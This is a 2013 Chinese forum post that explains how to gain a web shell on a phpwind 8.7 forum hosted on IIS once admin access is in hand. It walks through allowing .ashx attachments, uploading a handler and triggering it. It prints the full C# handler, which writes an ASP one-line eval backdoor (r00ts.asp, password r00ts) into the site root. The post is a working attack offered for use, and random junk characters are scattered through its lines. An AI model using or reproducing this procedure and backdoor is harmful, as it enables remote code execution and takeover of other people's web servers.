找回密码
 立即注册
查看: 2729|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
) @. u9 z: b* w& {5 j & U1 X- \/ V$ h. @
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
  A; ^( U0 P8 I 9 Z/ J. K( c0 S6 d5 v
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
' [+ m2 j/ a7 l. q7 z8 I5 ~9 R
3 I4 [2 q1 z. J" R然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx/ i1 o8 e% h5 ]2 v
% b( K  H8 Y/ g; C  T
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts* p7 C' ]. R3 i. J% C# Q8 g7 @
4 \# x0 [/ o7 J! ?
下面是代码:
6 _3 ]8 e* F% e9 g* L; C" H+ _ : u$ N/ N' t+ k: h/ t# A8 R
<%@ WebHandler Language="C#"Class="Handler" %>
1 q# T! T1 S& @  T2 x0 Vusing System;
. N7 v' U- o% x2 cusing System.Web;
) f' m& R) |( l  d6 Q0 rusing System.IO;' d% {' P2 q9 q2 ~- d
public class Handler : IHttpHandler {0 @$ |7 f9 l- j. B! j
public void ProcessRequest (HttpContext context) {
) m% D) L0 z3 [6 |4 n( ]context.Response.ContentType = "text/plain";
, D8 ]4 a9 Z. y7 e& ^# pStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));! L) c/ b) |9 O0 z
file1.Write("<%eval request(\"r00ts\")%>");+ x- |. |' B6 c2 a  v( m
file1.Flush();* G: P, \- t% @* a( b# u4 F
file1.Close();% C6 z0 V; a  e, M8 @6 ~! P
}
" |) H  y* ^- `: @! opublic bool IsReusable {
+ ^$ `) g$ O5 o' r$ s' f5 w9 ]get {5 F7 j1 x  {" u; w2 m
return false;
6 e8 {8 M" c/ T5 P}
. u$ C" k& G+ [- |}" t5 W- n# I' ^" B! Q( Z
}( _! `0 g. y! z1 @* O  `9 F# ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表